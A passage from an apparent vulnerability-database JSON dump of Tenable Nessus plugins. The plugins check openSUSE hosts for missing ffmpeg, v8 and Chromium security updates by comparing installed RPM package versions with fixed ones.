(boo#1009892)\n\nFFmpeg was updated to version 3.2, incorporating the following\nupstream improvements :\n\n - SDL2 output device and ffplay support\n\n - SDL1 output device and SDL1 support removed\n\n - New: libopenmpt demuxer, fifo muxer, True Audio (TTA)\n muxer\n\n - New filters: weave, gblur, avgblur, sobel, prewitt,\n vaguedenoiser, yuvtestsrc, lut2, hysteresis,\n maskedclamp, crystalizer, acrusher, bitplanenoise,\n sidedata, asidedata\n\n - Non-Local Means (nlmeans) denoising filter\n\n - 16-bit support in curves filter and selectivecolor\n filter\n\n - Added threads option per filter instance\n\n - The 'curves' filter does not automatically insert points\n at x=0 and x=1 anymore\n\n - Matroska muxer now writes CRC32 elements by default in\n all Level 1 elements\n\n - New 'tee' protocol\n\n - VP8 in Ogg muxing\n\n - Floating point support in ALS decoder\n\n - Extended mov edit list support\n\n - Changed mapping of RTP MIME type G726 to codec g726le.\n\nAlso contains a collection of upstream bug fixes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1009892\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ffmpeg packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ffmpeg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ffmpeg-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavcodec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavcodec57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavcodec57-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavcodec57-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavcodec57-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavdevice-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavdevice57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavdevice57-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavdevice57-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavdevice57-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavfilter-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavfilter6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavfilter6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavfilter6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavfilter6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavformat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavformat57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavformat57-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavformat57-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavformat57-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavresample-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavresample3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavresample3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavresample3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavresample3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavutil-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavutil55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavutil55-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavutil55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavutil55-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpostproc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpostproc54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpostproc54-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpostproc54-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpostproc54-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswresample-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswresample2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswresample2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswresample2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswscale-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswscale4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswscale4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswscale4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswscale4-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ffmpeg-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ffmpeg-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ffmpeg-debugsource-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavcodec-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavcodec57-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavcodec57-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavdevice-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavdevice57-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavdevice57-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavfilter-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavfilter6-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavfilter6-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavformat-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavformat57-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavformat57-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavresample-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavresample3-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavresample3-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavutil-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavutil55-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libavutil55-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libpostproc-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libpostproc54-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libpostproc54-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libswresample-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libswresample2-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libswresample2-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libswscale-devel-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libswscale4-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libswscale4-debuginfo-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavcodec57-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavcodec57-debuginfo-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavdevice57-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavdevice57-debuginfo-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavfilter6-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavfilter6-debuginfo-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavformat57-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavformat57-debuginfo-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavresample3-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavresample3-debuginfo-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavutil55-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libavutil55-debuginfo-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libpostproc54-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libpostproc54-debuginfo-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libswresample2-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libswresample2-debuginfo-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libswscale4-32bit-3.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libswscale4-debuginfo-32bit-3.2-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ffmpeg / ffmpeg-debuginfo / ffmpeg-debugsource / libavcodec-devel / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:38:13", "description": "This update for v8 fixes the following issues :\n\n - maliciously crafted java script code could cause v8 in chromium to crash", "cvss3": {"score": 6.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"}, "published": "2017-01-20T00:00:00", "type": "nessus", "title": "openSUSE Security Update : v8 (openSUSE-2017-119)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5219"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libv8-5", "p-cpe:/a:novell:opensuse:libv8-5-debuginfo", "p-cpe:/a:novell:opensuse:v8", "p-cpe:/a:novell:opensuse:v8-debuginfo", "p-cpe:/a:novell:opensuse:v8-debugsource", "p-cpe:/a:novell:opensuse:v8-devel", "p-cpe:/a:novell:opensuse:v8-private-headers-devel", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-119.NASL", "href": "https://www.tenable.com/plugins/nessus/96645", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-119.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96645);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5219\");\n\n script_name(english:\"openSUSE Security Update : v8 (openSUSE-2017-119)\");\n script_summary(english:\"Check for the openSUSE-2017-119 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for v8 fixes the following issues :\n\n - maliciously crafted java script code could cause v8 in\n chromium to crash\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1013274\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected v8 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libv8-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libv8-5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:v8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:v8-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:v8-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:v8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:v8-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libv8-5-5.3.332-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libv8-5-debuginfo-5.3.332-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"v8-5.3.332-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"v8-debuginfo-5.3.332-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"v8-debugsource-5.3.332-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"v8-devel-5.3.332-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"v8-private-headers-devel-5.3.332-3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libv8-5 / libv8-5-debuginfo / v8 / v8-debuginfo / v8-debugsource / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:26", "description": "Chromium was updated to 54.0.2840.59 to fix security issues and bugs.\n\nThe following security issues are fixed (bnc#1004465) :\n\n - CVE-2016-5181: Universal XSS in Blink\n\n - CVE-2016-5182: Heap overflow in Blink\n\n - CVE-2016-5183: Use after free in PDFium\n\n - CVE-2016-5184: Use after free in PDFium\n\n - CVE-2016-5185: Use after free in Blink\n\n - CVE-2016-5187: URL spoofing\n\n - CVE-2016-5188: UI spoofing\n\n - CVE-2016-5192: Cross-origin bypass in Blink\n\n - CVE-2016-5189: URL spoofing\n\n - CVE-2016-5186: Out of bounds read in DevTools\n\n - CVE-2016-5191: Universal XSS in Bookmarks\n\n - CVE-2016-5190: Use after free in Internals\n\n - CVE-2016-5193: Scheme bypass\n\nThe following bugs were fixed :\n\n - bnc#1000019: display issues in full screen mode, add\n --ui-disable-partial-swap to the launcher\n\nThe following packaging changes are included :\n\n - The desktop sub-packages are no obsolete\n\n - The package now uses the system variants of some bundled libraries\n\n - The hangouts extension is now built", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-10-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-2597)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-2597.NASL", "href": "https://www.tenable.com/plugins/nessus/94246", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-2597.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94246);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\", \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\", \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\", \"CVE-2016-5193\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-2597)\");\n script_summary(english:\"Check for the openSUSE-2016-2597 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 54.0.2840.59 to fix security issues and bugs.\n\nThe following security issues are fixed (bnc#1004465) :\n\n - CVE-2016-5181: Universal XSS in Blink\n\n - CVE-2016-5182: Heap overflow in Blink\n\n - CVE-2016-5183: Use after free in PDFium\n\n - CVE-2016-5184: Use after free in PDFium\n\n - CVE-2016-5185: Use after free in Blink\n\n - CVE-2016-5187: URL spoofing\n\n - CVE-2016-5188: UI spoofing\n\n - CVE-2016-5192: Cross-origin bypass in Blink\n\n - CVE-2016-5189: URL spoofing\n\n - CVE-2016-5186: Out of bounds read in DevTools\n\n - CVE-2016-5191: Universal XSS in Bookmarks\n\n - CVE-2016-5190: Use after free in Internals\n\n - CVE-2016-5193: Scheme bypass\n\nThe following bugs were fixed :\n\n - bnc#1000019: display issues in full screen mode, add\n --ui-disable-partial-swap to the launcher\n\nThe following packaging changes are included :\n\n - The desktop sub-packages are no obsolete\n\n - The package now uses the system variants of some bundled\n libraries\n\n - The hangouts extension is now built\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1000019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1004465\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-54.0.2840.59-131.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-54.0.2840.59-131.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-54.0.2840.59-131.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-54.0.2840.59-131.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-54.0.2840.59-131.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-54.0.2840.59-131.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-54.0.2840.59-131.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromedriver-54.0.2840.59-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-54.0.2840.59-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-54.0.2840.59-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-debuginfo-54.0.2840.59-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-debugsource-54.0.2840.59-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-ffmpegsumo-54.0.2840.59-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-ffmpegsumo-debuginfo-54.0.2840.59-82.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, 